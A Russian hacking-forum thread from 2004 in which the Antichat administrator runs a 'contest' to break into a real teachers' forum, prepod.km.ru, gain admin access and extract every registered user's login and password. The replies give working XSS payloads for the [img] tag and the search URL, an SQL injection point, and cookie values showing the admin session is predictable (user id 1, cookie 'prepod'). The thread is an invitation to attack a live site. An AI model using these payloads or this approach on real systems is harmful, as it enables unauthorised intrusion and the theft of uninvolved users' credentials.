Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
26.12.2004, 12:17
|
|
Администратор
Регистрация: 05.10.2003
Сообщений: 1,083
Провел на форуме:
4618051
Репутация:
45
|
|
Конкурс: поимей препода
Конкурс: поимей препода
Вчера с Егором за фигню угарали и нашли очень примитивный форум с очень примитивной защитой (хотя само понятие слова "защита" тут не употребимо) ...
В общем есть форум http://prepod.km.ru/forum/index.php
Вы там регистрируетесь, находите "уязвимость", авторизируетесь под админом и в админке выдираете из БД форума все логины и пароли зарегистрированных юзеров ...
Примичание: пароль к аккаунту администратора на форуме совпадает с паролем на e-mail ...
Кто первый с этим справится и отпишется тут, тот получит собственный статус на форуме 
Конкурс детский, так что призы тоже детские ... |
|
|
26.12.2004, 13:54
|
|
Участник форума
Регистрация: 11.12.2004
Сообщений: 242
Провел на форуме:
144460
Репутация:
39
|
|
один вопрос от начинающего хацкера-надо в html копаться или использовать id?
|
|
|
|
26.12.2004, 14:12
|
|
Администратор
Регистрация: 05.10.2003
Сообщений: 1,083
Провел на форуме:
4618051
Репутация:
45
|
|
На форуме есть xss в теге [img]
Код HTML:
[img]javascript:alert(document.cookie);[/img]
+ еще xss в поиске:
Код:
http://prepod.km.ru/forum/search.php?text_poisk=%3Cscript%3Ejavascript:alert();%3C/script%3E
Тут куки даже на сниффер высылать не надо ...
К тому же можно было покопаться с http://prepod.km.ru/forum/forum_tems.php?t=1&cat='
Но тут все гораздо проще ...
Последний раз редактировалось Че Гевара; 27.12.2004 в 17:43..
|
|
|
|
26.12.2004, 14:20
|
|
Участник форума
Регистрация: 11.12.2004
Сообщений: 242
Провел на форуме:
144460
Репутация:
39
|
|
не,тут я не силен
|
|
|
|
26.12.2004, 14:27
|
|
Умиротворенн
Регистрация: 09.12.2004
Сообщений: 996
Провел на форуме:
2386719
Репутация:
1384
|
|
lol - ну и система аутентификации  ))))
2Shits тебе не советовал бы по форуму лазить, когда там админ сидит,
темболее называясь грозным именем Hacker(SHiTS)
__________________
http://madnet.name - madnet - blog | homepage (Мысли, релизы, скрипты, софт)
http://antichat.ru - Лучший сайт по безопасности
irc.antichat.ru:7771 #antichat - общение online
ГАРАНТ ФОРУМА
|
|
|
|
26.12.2004, 14:33
|
|
Участник форума
Регистрация: 11.12.2004
Сообщений: 242
Провел на форуме:
144460
Репутация:
39
|
|
да пофиг,лучше скажи как пассы узнать!
я че-то где-то когда-то смотрел,по моему padonak.ru или .net ломали через куку
а тут че делать?
|
|
|
|
26.12.2004, 14:35
|
|
Умиротворенн
Регистрация: 09.12.2004
Сообщений: 996
Провел на форуме:
2386719
Репутация:
1384
|
|
Да млин элементарнее не может быть, вот только админ свалит Ж)
__________________
http://madnet.name - madnet - blog | homepage (Мысли, релизы, скрипты, софт)
http://antichat.ru - Лучший сайт по безопасности
irc.antichat.ru:7771 #antichat - общение online
ГАРАНТ ФОРУМА
|
|
|
|
26.12.2004, 14:37
|
|
Участник форума
Регистрация: 11.12.2004
Сообщений: 242
Провел на форуме:
144460
Репутация:
39
|
|
все вы такие...
|
|
|
|
26.12.2004, 14:38
|
|
Администратор
Регистрация: 05.10.2003
Сообщений: 1,083
Провел на форуме:
4618051
Репутация:
45
|
|
Ну блин ... Тут они еще думают ...
madnet
Ты то хоть прошел конкурс ? )
|
|
|
|
26.12.2004, 14:41
|
|
Умиротворенн
Регистрация: 09.12.2004
Сообщений: 996
Провел на форуме:
2386719
Репутация:
1384
|
|
Странноватые cookies
board_user_cook=belo4ka
board_user_id=9
а у админа как не странно
board_user_cook=prepod
board_user_id=1
Гы
__________________
http://madnet.name - madnet - blog | homepage (Мысли, релизы, скрипты, софт)
http://antichat.ru - Лучший сайт по безопасности
irc.antichat.ru:7771 #antichat - общение online
ГАРАНТ ФОРУМА
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
